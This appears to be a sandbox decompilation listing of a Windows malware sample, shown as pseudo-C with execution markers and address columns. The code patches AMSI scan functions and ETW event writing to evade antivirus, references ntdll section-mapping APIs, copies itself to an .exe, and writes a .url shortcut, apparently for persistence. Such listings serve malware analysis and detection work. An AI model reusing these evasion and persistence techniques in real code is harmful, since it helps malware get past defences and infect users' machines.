							E02174A98( &_v2812, E02174D64(_t2383));
							_pop(_t3986);
							E02183690(_v2812, _t3378, _t3986, 0x2194b88);
							E02174A98( &_v2816, "NtSetSecurityObject");
							_push(_v2816);
							_t2392 =  *0x2194bb8; // 0x3e09b08
							E02174A98( &_v2820, E02174D64(_t2392));
							_pop(_t3989);
							E02183690(_v2820, _t3378, _t3989, 0x2194b88);
							E02174A98( &_v2824, "NtQuerySecurityObject");
							_push(_v2824);
							_t2401 =  *0x2194bb8; // 0x3e09b08
							E02174A98( &_v2828, E02174D64(_t2401));
							_pop(_t3992);
							E02183690(_v2828, _t3378, _t3992, 0x2194b88);
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("ScanString");
							E02174C24();
							E02174A98( &_v2832, E02174D64(_v2836));
							_push(_v2832);
							_t3464 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v2844, _t3464, 0x218e77c);
							E02174A98( &_v2840, E02174D64(_v2844));
							_pop(_t3997); // executed
							E02183690(_v2840, _t3378, _t3997, 0x2194b88); // executed
							E02174A98( &_v2848, "NtCreateSection");
							_push(_v2848);
							_t2424 =  *0x2194bb8; // 0x3e09b08
							E02174A98( &_v2852, E02174D64(_t2424));
							_pop(_t4000);
							E02183690(_v2852, _t3378, _t4000, 0x2194b88);
							E02174A98( &_v2856, "NtOpenSection");
							_push(_v2856);
							_t2433 =  *0x2194bb8; // 0x3e09b08
							E02174A98( &_v2860, E02174D64(_t2433));
							_pop(_t4003);
							E02183690(_v2860, _t3378, _t4003, 0x2194b88);
							E02174A98( &_v2864, "NtMapViewOfSection");
							_push(_v2864);
							_t2442 =  *0x2194bb8; // 0x3e09b08
							E02174A98( &_v2868, E02174D64(_t2442));
							_pop(_t4006);
							E02183690(_v2868, _t3378, _t4006, 0x2194b88);
							E02174A98( &_v2872, "NtCreateFile");
							_push(_v2872);
							_t2451 =  *0x2194bb8; // 0x3e09b08
							E02174A98( &_v2876, E02174D64(_t2451));
							_pop(_t4009);
							E02183690(_v2876, _t3378, _t4009, 0x2194b88);
							E02174A98( &_v2880, "EtwEventWriteEx");
							_push(_v2880);
							_t2460 =  *0x2194bb8; // 0x3e09b08
							E02174A98( &_v2884, E02174D64(_t2460));
							_pop(_t4012);
							E02183690(_v2884, _t3378, _t4012, 0x2194b88);
							E02174A98( &_v2888, "NtOpenFile");
							_push(_v2888);
							_t2469 =  *0x2194bb8; // 0x3e09b08
							E02174A98( &_v2892, E02174D64(_t2469));
							_pop(_t4015);
							E02183690(_v2892, _t3378, _t4015, 0x2194b88);
							E02174A98( &_v2896, "EtwEventWrite");
							_push(_v2896);
							_t2478 =  *0x2194bb8; // 0x3e09b08
							E02174A98( &_v2900, E02174D64(_t2478));
							_pop(_t4018);
							E02183690(_v2900, _t3378, _t4018, 0x2194b88);
							ExitProcess(0); // executed
							goto L62;
						} else {
							_push( *0x2194b84);
							_push(0x218e8d8);
							_push("Null");
							E02174C24();
							E02174A98( &_v1432, E02174D64(_v1436));
							_t2784 = E021780F8(_v1432);
							__eflags = _t2784;
							if(_t2784 != 0) {
								goto L37;
							} else {
								E02174A98( &_v1440, "C:\\Windows\\SysWOW64");
								_t2788 = E0217811C(_v1440);
								__eflags = _t2788;
								if(_t2788 == 0) {
									goto L37;
								} else {
									_push(0x218e77c);
									_push( *0x2194bb0);
									_push("OpenSession");
									E02174C24();
									E02174A98( &_v1444, E02174D64(_v1448));
									_push(_v1444);
									_t3484 =  *0x2194bb0; // 0x3e01b38
									E02174BB0( &_v1456, _t3484, 0x218e77c);
									E02174A98( &_v1452, E02174D64(_v1456));
									_pop(_t4127);
									E02183690(_v1452, _t3378, _t4127, 0x2194b88);
									_push(0x218e77c);
									_push( *0x2194bb0);
									_push("ScanBuffer");
									E02174C24();
									E02174A98( &_v1460, E02174D64(_v1464));
									_push(_v1460);
									_t3485 =  *0x2194bb0; // 0x3e01b38
									E02174BB0( &_v1472, _t3485, 0x218e77c);
									E02174A98( &_v1468, E02174D64(_v1472));
									_pop(_t4132);
									E02183690(_v1468, _t3378, _t4132, 0x2194b88);
									 *0x2194b8c = E02173C30(1);
									 *[fs:eax] = _t4337;
									E0217304C(0x64);
									E02177C4C( &_v1476);
									_t2824 =  *0x2194b8c; // 0x3dde990
									 *((intOrPtr*)( *_t2824 + 0x38))( *[fs:eax], 0x218c0d2, _t4336);
									E02174C24();
									E02174A98( &_v1480, E02174D64(_v1484));
									_t2831 =  *0x2194b8c; // 0x3dde990
									 *((intOrPtr*)( *_t2831 + 0x74))("Null", 0x218e8d8,  *0x2194b84);
									__eflags = 0;
									_pop(_t4139);
									 *[fs:eax] = _t4139;
									_push(E0218C0D9);
									_t2834 =  *0x2194b8c; // 0x3dde990
									return E02173C60(_t2834);
								}
							}
						}
					} else {
						_push( *0x2194b84);
						_push(0x218e8d8);
						_t2836 =  *0x2194bd4; // 0x3e09388
						E02188E04(_t2836, _t3378, _t3434,  &_v776, _t4332, 0x2194b88);
						_push(_v776);
						_push(".url");
						E02174C24();
						E02174A98( &_v768, E02174D64(_v772));
						if(E021780F8(_v768) != 0) {
							goto L32;
						} else {
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("Initialize");
							E02174C24();
							E02174A98( &_v780, E02174D64(_v784));
							_push(_v780);
							_t3490 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v792, _t3490, 0x218e77c);
							E02174A98( &_v788, E02174D64(_v792));
							_pop(_t4147); // executed
							E02183690(_v788, _t3378, _t4147, 0x2194b88); // executed
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("ScanBuffer");
							E02174C24();
							E02174A98( &_v796, E02174D64(_v800));
							_push(_v796);
							_t3491 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v808, _t3491, 0x218e77c);
							E02174A98( &_v804, E02174D64(_v808));
							_pop(_t4152); // executed
							E02183690(_v804, _t3378, _t4152, 0x2194b88); // executed
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("OpenSession");
							E02174C24();
							E02174A98( &_v812, E02174D64(_v816));
							_push(_v812);
							_t3492 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v824, _t3492, 0x218e77c);
							E02174A98( &_v820, E02174D64(_v824));
							_pop(_t4157); // executed
							E02183690(_v820, _t3378, _t4157, 0x2194b88); // executed
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("ScanString");
							E02174C24();
							E02174A98( &_v828, E02174D64(_v832));
							_push(_v828);
							_t3493 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v840, _t3493, 0x218e77c);
							E02174A98( &_v836, E02174D64(_v840));
							_pop(_t4162); // executed
							E02183690(_v836, _t3378, _t4162, 0x2194b88); // executed
							_push( *0x2194b84);
							_push(0x218e8d8);
							_push( *0x2194bd4);
							E02174C24();
							E02174A98(0x2194bd0, E02174D64(_v844));
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("Initialize");
							E02174C24();
							E02174A98( &_v848, E02174D64(_v852));
							_push(_v848);
							_t3494 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v860, _t3494, 0x218e77c);
							E02174A98( &_v856, E02174D64(_v860));
							_pop(_t4169); // executed
							E02183690(_v856, _t3378, _t4169, 0x2194b88); // executed
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("ScanBuffer");
							E02174C24();
							E02174A98( &_v864, E02174D64(_v868));
							_push(_v864);
							_t3495 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v876, _t3495, 0x218e77c);
							E02174A98( &_v872, E02174D64(_v876));
							_pop(_t4174); // executed
							E02183690(_v872, _t3378, _t4174, 0x2194b88); // executed
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("OpenSession");
							E02174C24();
							E02174A98( &_v880, E02174D64(_v884));
							_push(_v880);
							_t3496 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v892, _t3496, 0x218e77c);
							E02174A98( &_v888, E02174D64(_v892));
							_pop(_t4179); // executed
							E02183690(_v888, _t3378, _t4179, 0x2194b88); // executed
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("ScanString");
							E02174C24();
							E02174A98( &_v896, E02174D64(_v900));
							_push(_v896);
							_t3497 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v908, _t3497, 0x218e77c);
							E02174A98( &_v904, E02174D64(_v908));
							_pop(_t4184); // executed
							E02183690(_v904, _t3378, _t4184, 0x2194b88);
							_t2962 =  *0x2194bd0; // 0x3d954b8
							if((E021780F8(_t2962) ^ 0x00000001) == 1) {
								_push(0x218e77c);
								_push( *0x2194bb0);
								_push("Initialize");
								E02174C24();
								E02174A98( &_v912, E02174D64(_v916));
								_push(_v912);
								_t3520 =  *0x2194bb0; // 0x3e01b38
								E02174BB0( &_v924, _t3520, 0x218e77c);
								E02174A98( &_v920, E02174D64(_v924));
								_pop(_t4272); // executed
								E02183690(_v920, _t3378, _t4272, 0x2194b88); // executed
								_push(0x218e77c);
								_push( *0x2194bb0);
								_push("OpenSession");
								E02174C24();
								E02174A98( &_v928, E02174D64(_v932));
								_push(_v928);
								_t3521 =  *0x2194bb0; // 0x3e01b38
								E02174BB0( &_v940, _t3521, 0x218e77c);
								E02174A98( &_v936, E02174D64(_v940));
								_pop(_t4277); // executed
								E02183690(_v936, _t3378, _t4277, 0x2194b88); // executed
								_push(0x218e77c);
								_push( *0x2194bb0);
								_push("ScanBuffer");
								E02174C24();
								E02174A98( &_v944, E02174D64(_v948));
								_push(_v944);
								_t3522 =  *0x2194bb0; // 0x3e01b38
								E02174BB0( &_v956, _t3522, 0x218e77c);
								E02174A98( &_v952, E02174D64(_v956));
								_pop(_t4282); // executed
								E02183690(_v952, _t3378, _t4282, 0x2194b88);
								_t3235 =  *0x2194bd0; // 0x3d954b8
								E02174A98( &_v960, E02174D64(_t3235));
								_t3239 =  *0x2194b7c; // 0x3d65538, executed
								E021889A4(_t3239, _t3378, _v960, 0x2194b88); // executed
							}
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("Initialize");
							E02174C24();
							E02174A98( &_v964, E02174D64(_v968));
							_push(_v964);
							_t3498 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v976, _t3498, 0x218e77c);
							E02174A98( &_v972, E02174D64(_v976));
							_pop(_t4189); // executed
							E02183690(_v972, _t3378, _t4189, 0x2194b88); // executed
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("ScanBuffer");
							E02174C24();
							E02174A98( &_v980, E02174D64(_v984));
							_push(_v980);
							_t3499 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v992, _t3499, 0x218e77c);
							E02174A98( &_v988, E02174D64(_v992));
							_pop(_t4194); // executed
							E02183690(_v988, _t3378, _t4194, 0x2194b88); // executed
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("OpenSession");
							E02174C24();
							E02174A98( &_v996, E02174D64(_v1000));
							_push(_v996);
							_t3500 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v1008, _t3500, 0x218e77c);
							E02174A98( &_v1004, E02174D64(_v1008));
							_pop(_t4199); // executed
							E02183690(_v1004, _t3378, _t4199, 0x2194b88); // executed
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("ScanString");
							E02174C24();
							E02174A98( &_v1012, E02174D64(_v1016));
							_push(_v1012);
							_t3501 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v1024, _t3501, 0x218e77c);
							E02174A98( &_v1020, E02174D64(_v1024));
							_pop(_t4204); // executed
							E02183690(_v1020, _t3378, _t4204, 0x2194b88); // executed
							_push( *0x2194b84);
							_push(0x218e8d8);
							_push( *0x2194bd4);
							_push(".exe");
							E02174C24();
							E02174A98(0x21949c0, E02174D64(_v1028));
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("ScanBuffer");
							E02174C24();
							E02174A98( &_v1032, E02174D64(_v1036));
							_push(_v1032);
							_t3502 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v1044, _t3502, 0x218e77c);
							E02174A98( &_v1040, E02174D64(_v1044));
							_pop(_t4211); // executed
							E02183690(_v1040, _t3378, _t4211, 0x2194b88); // executed
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("ScanString");
							E02174C24();
							E02174A98( &_v1048, E02174D64(_v1052));
							_push(_v1048);
							_t3503 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v1060, _t3503, 0x218e77c);
							E02174A98( &_v1056, E02174D64(_v1060));
							_pop(_t4216); // executed
							E02183690(_v1056, _t3378, _t4216, 0x2194b88); // executed
							_t3054 =  *0x21949c0; // 0x3df34f0
							_t3055 = E02174D64(_t3054);
							E02172FC4(0,  &_v1064);
							CopyFileA(E02174D64(_v1064), _t3055, 0xffffffff); // executed
							E02174A98( &_v1068, "CopyFileA");
							_push(_v1068);
							E02174A98( &_v1072, "kernel32");
							_pop(_t4220);
							E02183690(_v1072, _t3378, _t4220, 0x2194b88);
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("OpenSession");
							E02174C24();
							E02174A98( &_v1076, E02174D64(_v1080));
							_push(_v1076);
							_t3504 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v1088, _t3504, 0x218e77c);
							E02174A98( &_v1084, E02174D64(_v1088));
							_pop(_t4225); // executed
							E02183690(_v1084, _t3378, _t4225, 0x2194b88); // executed
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("ScanBuffer");
							E02174C24();
							E02174A98( &_v1092, E02174D64(_v1096));
							_push(_v1092);
							_t3505 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v1104, _t3505, 0x218e77c);
							E02174A98( &_v1100, E02174D64(_v1104));
							_pop(_t4230); // executed
							E02183690(_v1100, _t3378, _t4230, 0x2194b88); // executed
							_t3097 =  *0x21949c0; // 0x3df34f0
							E02188718(_t3097, _t3378, 0x218e91c, 0x218e8d8, _t4332, 0x2194b88,  &_v1108);
							E021748F4(0x21949d4, _v1108);
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("OpenSession");
							E02174C24();
							E02174A98( &_v1112, E02174D64(_v1116));
							_push(_v1112);
							_t3507 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v1124, _t3507, 0x218e77c);
							E02174A98( &_v1120, E02174D64(_v1124));
							_pop(_t4237); // executed
							E02183690(_v1120, _t3378, _t4237, 0x2194b88); // executed
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("ScanBuffer");
							E02174C24();
							E02174A98( &_v1128, E02174D64(_v1132));
							_push(_v1128);
							_t3508 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v1140, _t3508, 0x218e77c);
							E02174A98( &_v1136, E02174D64(_v1140));
							_pop(_t4242); // executed
							E02183690(_v1136, _t3378, _t4242, 0x2194b88); // executed
							 *0x2194b8c = E02173C30(1);
							_push(_t4336);
							_push(0x218b800);
							_push( *[fs:eax]);
							 *[fs:eax] = _t4337;
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("Initialize");
							E02174C24();
							E02174A98( &_v1144, E02174D64(_v1148));
							_push(_v1144);
							_t3509 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v1156, _t3509, 0x218e77c);
							E02174A98( &_v1152, E02174D64(_v1156));
							_pop(_t4248); // executed
							E02183690(_v1152, _t3378, _t4248, 0x2194b88); // executed
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("ScanString");
							E02174C24();
							E02174A98( &_v1160, E02174D64(_v1164));
							_push(_v1160);
							_t3510 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v1172, _t3510, 0x218e77c);
							E02174A98( &_v1168, E02174D64(_v1172));
							_pop(_t4253); // executed
							E02183690(_v1168, _t3378, _t4253, 0x2194b88); // executed
							_t3160 =  *0x2194b8c; // 0x3dde990
							 *((intOrPtr*)( *_t3160 + 0x38))();
							E02174C24();
							_t3163 =  *0x2194b8c; // 0x3dde990
							 *((intOrPtr*)( *_t3163 + 0x38))(0x218e958,  *0x21949d4, "URL=file:\"");
							E0217304C(0x3a);
							E02177C4C( &_v1184);
							E02174BB0( &_v1180, _v1184, "IconIndex=");
							_t3171 =  *0x2194b8c; // 0x3dde990
							 *((intOrPtr*)( *_t3171 + 0x38))();
							E0217304C(0x63);
							E02177C4C( &_v1192);
							E02174BB0( &_v1188, _v1192, "HotKey=");
							_t3179 =  *0x2194b8c; // 0x3dde990
							 *((intOrPtr*)( *_t3179 + 0x38))();
							_t3181 =  *0x2194bd4; // 0x3e09388
							E02188E04(_t3181, _t3378,  *_t3179,  &_v1204, _t4332, 0x2194b88);
							E02174C24();
							E02174A98( &_v1196, E02174D64(_v1200));
							_t3188 =  *0x2194b8c; // 0x3dde990
							 *((intOrPtr*)( *_t3188 + 0x74))(".url", _v1204, 0x218e8d8,  *0x2194b84);
							_pop(_t4267);
							 *[fs:eax] = _t4267;
							_push(E0218B807);
							_t3191 =  *0x2194b8c; // 0x3dde990
							return E02173C60(_t3191); // executed
						}
					}
				}
				L1:
				_push(0);
				_push(0);
				_t3383 = _t3383 - 1;
				if(_t3383 != 0) {
					goto L1;
				} else {
					_push(__ebx);
					_push(_t4336);
					_push(0x218e742);
					_push( *[fs:eax]);
					 *[fs:eax] = _t4337;
					E02173024();
					_t1159 = E0217304C(0x38c);
					_push(_t1159); // executed
					L021858FC(); // executed
					if(_t1159 == 0) {
						_t1161 = E0217304C(0x38c);
						_push(_t1161);
						L021858FC();
						__eflags = _t1161;
						if(_t1161 == 0) {
							E021748F4(0x2194bb0, 0x218e770);
						} else {
							E021748F4(0x2194bb0, "5E5CDDEE");
						}
					} else {
						E021748F4(0x21949d8, "5E5CDDEE");
					}
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("OpenSession");
					E02174C24();
					E02174A98( &_v8, E02174D64(_v12));
					_push(_v8);
					_t3384 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v20, _t3384, 0x218e77c);
					E02174A98( &_v16, E02174D64(_v20));
					_pop(_t3534); // executed
					E02183690(_v16, _t3375, _t3534, 0x2194b88); // executed
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("ScanString");
					E02174C24();
					E02174A98( &_v24, E02174D64(_v28));
					_push(_v24);
					_t3385 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v36, _t3385, 0x218e77c);
					E02174A98( &_v32, E02174D64(_v36));
					_pop(_t3539); // executed
					E02183690(_v32, _t3375, _t3539, 0x2194b88); // executed
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("Initialize");
					E02174C24();
					E02174A98( &_v40, E02174D64(_v44));
					_push(_v40);
					_t3386 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v52, _t3386, 0x218e77c);
					E02174A98( &_v48, E02174D64(_v52));
					_pop(_t3544); // executed
					E02183690(_v48, _t3375, _t3544, 0x2194b88); // executed
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("ScanBuffer");
					E02174C24();
					E02174A98( &_v56, E02174D64(_v60));
					_push(_v56);
					_t3387 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v68, _t3387, 0x218e77c);
					E02174A98( &_v64, E02174D64(_v68));
					_pop(_t3549); // executed
					E02183690(_v64, _t3375, _t3549, 0x2194b88); // executed
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("Initialize");
					E02174C24();
					E02174A98( &_v72, E02174D64(_v76));
					_push(_v72);
					_t3388 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v84, _t3388, 0x218e77c);
					E02174A98( &_v80, E02174D64(_v84));
					_pop(_t3554); // executed
					E02183690(_v80, _t3375, _t3554, 0x2194b88); // executed
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("OpenSession");
					E02174C24();
					E02174A98( &_v88, E02174D64(_v92));
					_push(_v88);
					_t3389 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v100, _t3389, 0x218e77c);
					E02174A98( &_v96, E02174D64(_v100));
					_pop(_t3559); // executed
					E02183690(_v96, _t3375, _t3559, 0x2194b88); // executed
					E02174A98(0x2194b4c, E02174D64( *((intOrPtr*)(0x2190ab8 + E02183658(1, 3) * 4))));
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("ScanString");
					E02174C24();
					E02174A98( &_v104, E02174D64(_v108));
					_push(_v104);
					_t3390 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v116, _t3390, 0x218e77c);
					E02174A98( &_v112, E02174D64(_v116));
					_pop(_t3566); // executed
					E02183690(_v112, _t3375, _t3566, 0x2194b88); // executed
					_t3391 =  *0x2194b4c; // 0x3dfa858
					E02174BB0( &_v120, _t3391, "C:\\Windows\\System32\\");
					if(E021780F8(_v120) == 0) {
						_push(0x218e77c);
						_push( *0x2194bb0);
						_push("ScanString");
						E02174C24();
						E02174A98( &_v140, E02174D64(_v144));
						_push(_v140);
						_t3392 =  *0x2194bb0; // 0x3e01b38
						E02174BB0( &_v152, _t3392, 0x218e77c);
						E02174A98( &_v148, E02174D64(_v152));
						_pop(_t3572);
						E02183690(_v148, _t3375, _t3572, 0x2194b88);
						E021748F4(0x2194b34, "iexpress.exe");
					} else {
						_push(0x218e77c);
						_push( *0x2194bb0);
						_push("ScanString");
						E02174C24();
						E02174A98( &_v124, E02174D64(_v128));
						_push(_v124);
						_t3528 =  *0x2194bb0; // 0x3e01b38
						E02174BB0( &_v136, _t3528, 0x218e77c);
						E02174A98( &_v132, E02174D64(_v136));
						_pop(_t4328); // executed
						E02183690(_v132, _t3375, _t4328, 0x2194b88); // executed
						_t4329 =  *0x2194b4c; // 0x3dfa858
						E021748F4(0x2194b34, _t4329);
					}
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("OpenSession");
					E02174C24();
					E02174A98( &_v156, E02174D64(_v160));
					_push(_v156);
					_t3393 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v168, _t3393, 0x218e77c);
					E02174A98( &_v164, E02174D64(_v168));
					_pop(_t3578); // executed
					E02183690(_v164, _t3375, _t3578, 0x2194b88); // executed
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("ScanBuffer");
					E02174C24();
					E02174A98( &_v172, E02174D64(_v176));
					_push(_v172);
					_t3394 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v184, _t3394, 0x218e77c);
					E02174A98( &_v180, E02174D64(_v184));
					_pop(_t3583); // executed
					E02183690(_v180, _t3375, _t3583, 0x2194b88); // executed
					E0217C510(0,  &_v188);
					E021748F4(0x21949d8, _v188);
					_t1320 =  *0x21949d8; // 0x3d3c508
					_v192 = _t1320;
					_t3376 = _v192;
					if(_t3376 != 0) {
						_t3376 =  *((intOrPtr*)(_t3376 - 4));
					}
				}
				goto L12;
			}





































































































































































































































































































































































































































































































































































































































































































































































































































































































































































                                                                                                0x02189128
                                                                                                0x02189128
                                                                                                0x02189128
                                                                                                0x02189129
                                                                                                0x0218912b
                                                                                                0x0218912b
                                                                                                0x021896c4
                                                                                                0x021896d3
                                                                                                0x021896d8
                                                                                                0x021896dd
                                                                                                0x021896e2
                                                                                                0x021896e8
                                                                                                0x021896f8
                                                                                                0x02189710
                                                                                                0x0218971b
                                                                                                0x02189722
                                                                                                0x0218972d
                                                                                                0x02189745
                                                                                                0x02189750
                                                                                                0x02189751
                                                                                                0x02189756
                                                                                                0x02189768
                                                                                                0x02189773
                                                                                                0x02189778
                                                                                                0x0218977a
                                                                                                0x0218997f
                                                                                                0x02189984
                                                                                                0x0218998a
                                                                                                0x0218999a
                                                                                                0x021899b2
                                                                                                0x021899bd
                                                                                                0x021899c4
                                                                                                0x021899cf
                                                                                                0x021899e7
                                                                                                0x021899f2
                                                                                                0x021899f3
                                                                                                0x021899f8
                                                                                                0x021899fd
                                                                                                0x02189a03
                                                                                                0x02189a13
                                                                                                0x02189a2b
                                                                                                0x02189a36
                                                                                                0x02189a3d
                                                                                                0x02189a48
                                                                                                0x02189a60
                                                                                                0x02189a6b
                                                                                                0x02189a6c
                                                                                                0x02189a71
                                                                                                0x02189a76
                                                                                                0x02189a7c
                                                                                                0x02189a8c
                                                                                                0x02189aa4
                                                                                                0x02189aaf
                                                                                                0x02189ab6
                                                                                                0x02189ac1
                                                                                                0x02189ad9
                                                                                                0x02189ae4
                                                                                                0x02189ae5
                                                                                                0x02189afa
                                                                                                0x02189b0a
                                                                                                0x02189b0f
                                                                                                0x02189b14
                                                                                                0x02189b26
                                                                                                0x02189b41
                                                                                                0x02189b46
                                                                                                0x02189b4b
                                                                                                0x02189b51
                                                                                                0x02189b57
                                                                                                0x02189b59
                                                                                                0x02189b5b
                                                                                                0x02189b5b
                                                                                                0x02189b5e
                                                                                                0x02189b5e
                                                                                                0x02189b67
                                                                                                0x02189b75
                                                                                                0x02189b7a
                                                                                                0x02189b89
                                                                                                0x02189b99
                                                                                                0x02189b9e
                                                                                                0x02189bab
                                                                                                0x02189bb1
                                                                                                0x02189bb6
                                                                                                0x02189bbb
                                                                                                0x02189bc1
                                                                                                0x02189bd1
                                                                                                0x02189be9
                                                                                                0x02189bf4
                                                                                                0x02189bfb
                                                                                                0x02189c06
                                                                                                0x02189c1e
                                                                                                0x02189c29
                                                                                                0x02189c2a
                                                                                                0x02189c39
                                                                                                0x02189c3e
                                                                                                0x02189c43
                                                                                                0x02189c49
                                                                                                0x02189c59
                                                                                                0x02189c71
                                                                                                0x02189c7c
                                                                                                0x02189c83
                                                                                                0x02189c8e
                                                                                                0x02189ca6
                                                                                                0x02189cb1
                                                                                                0x02189cb2
                                                                                                0x02189cbc
                                                                                                0x02189cc9
                                                                                                0x02189cce
                                                                                                0x02189cde
                                                                                                0x02189ce3
                                                                                                0x02189ce8
                                                                                                0x02189cee
                                                                                                0x02189cfe
                                                                                                0x02189d16
                                                                                                0x02189d21
                                                                                                0x02189d28
                                                                                                0x02189d33
                                                                                                0x02189d4b
                                                                                                0x02189d56
                                                                                                0x02189d57
                                                                                                0x02189d5c
                                                                                                0x02189d61
                                                                                                0x02189d67
                                                                                                0x02189d77
                                                                                                0x02189d8f
                                                                                                0x02189d9a
                                                                                                0x02189da1
                                                                                                0x02189dac
                                                                                                0x02189dc4
                                                                                                0x02189dcf
                                                                                                0x02189dd0
                                                                                                0x02189dda
                                                                                                0x02189de4
                                                                                                0x02189de6
                                                                                                0x02189df2
                                                                                                0x02189df7
                                                                                                0x02189e07
                                                                                                0x02189e17
                                                                                                0x02189e22
                                                                                                0x02189e2e
                                                                                                0x02189e39
                                                                                                0x02189e3a
                                                                                                0x02189e4a
                                                                                                0x02189e55
                                                                                                0x02189e61
                                                                                                0x02189e6c
                                                                                                0x02189e6d
                                                                                                0x02189e7d
                                                                                                0x02189e88
                                                                                                0x02189e94
                                                                                                0x02189e9f
                                                                                                0x02189ea0
                                                                                                0x02189eb0
                                                                                                0x02189ebb
                                                                                                0x02189ec7
                                                                                                0x02189ed2
                                                                                                0x02189ed3
                                                                                                0x02189ed8
                                                                                                0x02189edd
                                                                                                0x02189ee3
                                                                                                0x02189ef3
                                                                                                0x02189f0b
                                                                                                0x02189f16
                                                                                                0x02189f1d
                                                                                                0x02189f28
                                                                                                0x02189f40
                                                                                                0x02189f4b
                                                                                                0x02189f4c
                                                                                                0x02189f4c
                                                                                                0x02189f51
                                                                                                0x02189f56
                                                                                                0x02189f5c
                                                                                                0x02189f6c
                                                                                                0x02189f84
                                                                                                0x02189f8f
                                                                                                0x02189f96
                                                                                                0x02189fa1
                                                                                                0x02189fb9
                                                                                                0x02189fc4
                                                                                                0x02189fc5
                                                                                                0x02189fca
                                                                                                0x02189fcf
                                                                                                0x02189fd5
                                                                                                0x02189fe5
                                                                                                0x02189ffd
                                                                                                0x0218a008
                                                                                                0x0218a00f
                                                                                                0x0218a01a
                                                                                                0x0218a032
                                                                                                0x0218a03d
                                                                                                0x0218a03e
                                                                                                0x02189780
                                                                                                0x02189780
                                                                                                0x02189785
                                                                                                0x0218978b
                                                                                                0x0218979b
                                                                                                0x021897b3
                                                                                                0x021897be
                                                                                                0x021897c5
                                                                                                0x021897d0
                                                                                                0x021897e8
                                                                                                0x021897f3
                                                                                                0x021897f4
                                                                                                0x021897f9
                                                                                                0x021897fe
                                                                                                0x02189804
                                                                                                0x02189814
                                                                                                0x0218982c
                                                                                                0x02189837
                                                                                                0x0218983e
                                                                                                0x02189849
                                                                                                0x02189861
                                                                                                0x0218986c
                                                                                                0x0218986d
                                                                                                0x02189872
                                                                                                0x02189877
                                                                                                0x0218987d
                                                                                                0x0218988d
                                                                                                0x021898a5
                                                                                                0x021898b0
                                                                                                0x021898b7
                                                                                                0x021898c2
                                                                                                0x021898da
                                                                                                0x021898e5
                                                                                                0x021898e6
                                                                                                0x021898eb
                                                                                                0x021898f6
                                                                                                0x021898fb
                                                                                                0x02189900
                                                                                                0x02189912
                                                                                                0x0218992d
                                                                                                0x02189932
                                                                                                0x02189937
                                                                                                0x0218993d
                                                                                                0x02189945
                                                                                                0x02189947
                                                                                                0x02189947
                                                                                                0x0218994a
                                                                                                0x0218994a
                                                                                                0x02189953
                                                                                                0x02189966
                                                                                                0x02189975
                                                                                                0x02189975
                                                                                                0x0218a043
                                                                                                0x0218a048
                                                                                                0x0218a04e
                                                                                                0x0218a05e
                                                                                                0x0218a076
                                                                                                0x0218a081
                                                                                                0x0218a088
                                                                                                0x0218a093
                                                                                                0x0218a0ab
                                                                                                0x0218a0b6
                                                                                                0x0218a0b7
                                                                                                0x0218a0bc
                                                                                                0x0218a0c1
                                                                                                0x0218a0c7
                                                                                                0x0218a0d7
                                                                                                0x0218a0ef
                                                                                                0x0218a0fa
                                                                                                0x0218a101
                                                                                                0x0218a10c
                                                                                                0x0218a124
                                                                                                0x0218a12f
                                                                                                0x0218a130
